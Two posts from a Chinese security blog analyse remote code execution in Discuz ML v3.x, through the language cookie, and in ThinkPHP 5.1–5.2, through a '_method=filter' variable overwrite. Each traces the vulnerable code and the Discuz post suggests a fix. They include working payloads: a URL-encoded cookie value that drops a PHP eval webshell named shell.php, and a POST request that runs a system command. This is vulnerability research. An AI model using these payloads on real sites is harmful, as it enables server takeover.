Discuz Ml v3.x 代码执行分析

Y4er — Thu, 11 Jul 2019 14:34:52 +0000

昨天晚上Discuz Ml爆出了漏洞，今天来分析一波。

exp

修改Cookie中的xxxx_language字段为以下内容即可

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2547%2545%2554%255b%2522a1%2522%255d%29%253b%253f%253e%27%29%29.%27

访问网站首页则会在根目录下生成木马文件,shell.php 密码为a1

定位漏洞位置

解码exp

'.+file_put_contents('shell.php',urldecode('')).'

修改exp为_language=1.1.1;使其报错。

定位到653行

关键代码644行

$cachefile = './data/template/'.DISCUZ_LANG.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php';

cachefile变量是缓存文件，将其写入到/data/template/目录下，并且由DISCUZ_LANG拼接，追踪下DISCUZ_LANG的值
2088-2096行

global $_G;
if($_G['config']['output']['language'] == 'zh_cn') {
return 'SC_UTF8';
} elseif ($_G['config']['output']['language'] == 'zh_tw') {
return 'TC_UTF8';
} else {
//vot !!!! ToDo: Check this for other languages !!!!!!!!!!!!!!!!!!!!!
/*vot*/         return strtoupper(DISCUZ_LANG) . '_UTF8';
}

可以看到$_G['config']['output']['language']作为DISCUZ_LANG的值

全局搜索['language']

source/class/discuz/discuz_application.php 305行，发现是从cookie中拿到language的值

那么到这里整个漏洞的流程就很明显了，cookie中language参数可控导致DISCUZ_LANG可控，从而导致cachefile的文件名可被注入代码，最终include_once包含一下导致了造成代码执行。

phpinfo验证

Ov1T_2132_language='.phpinfo().';

修复建议

截止到本文发布之前，补丁还没有出来。

建议修改source/function/function_core.php 644行为

/*vot*/ $cachefile = './data/template/'.'sc'.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php';

删除可控变量

写在文后

其实从漏洞点的注释上来看就知道这是一个未完成的部分，毕竟还是TODO，开发人员得背锅。不过我怎么没有这种好运气呢，呜呜呜😭

Thinkphp5.1 ~ 5.2 全版本代码执行

Y4er — Tue, 15 Jan 2019 08:02:21 +0000

序言

最近爆出了Thinkphp5.0.*全版本代码执行，其中5.1与5.2全版本在生产环境下下同样也存在代码执行

漏洞分析：

文件位置：\thinkphp\library\think\Request.php

    /**
     * 当前的请求类型
     * @access public
     * @param  bool $origin  是否获取原始请求类型
     * @return string
     */
    public function method($origin = false)
    {
        if ($origin) {
            // 获取原始请求类型
            return $this->server('REQUEST_METHOD') ?: 'GET';
        } elseif (!$this->method) {
            if (isset($_POST[$this->config['var_method']])) {
                $this->method    = strtoupper($_POST[$this->config['var_method']]);
                $method          = strtolower($this->method);
                $this->{$method} = $_POST;
            } elseif ($this->server('HTTP_X_HTTP_METHOD_OVERRIDE')) {
                $this->method = strtoupper($this->server('HTTP_X_HTTP_METHOD_OVERRIDE'));
            } else {
                $this->method = $this->server('REQUEST_METHOD') ?: 'GET';
            }
        }

        return $this->method;
    }

其中：

$this->method    = strtoupper($_POST[$this->config['var_method']]);
$method          = strtolower($this->method);
$this->{$method} = $_POST;

$method变量是$this->method，其同等于POST的”_method”参数值

然后该处存在一个变量覆盖

我们可以覆盖 $filter 属性值(POC如下)

c=exec&f=calc.exe&&_method=filter&

访问如下图所示：

会爆出一个警告级别的异常，导致程序终止

如何触发：

如果设置忽略异常提示，如下图：

本身项目发布就需要屏蔽异常和错误所以这个配置是一个正常的配置

Payload（POST请求）:

弹出计算器

代码执行 – ChaBug安全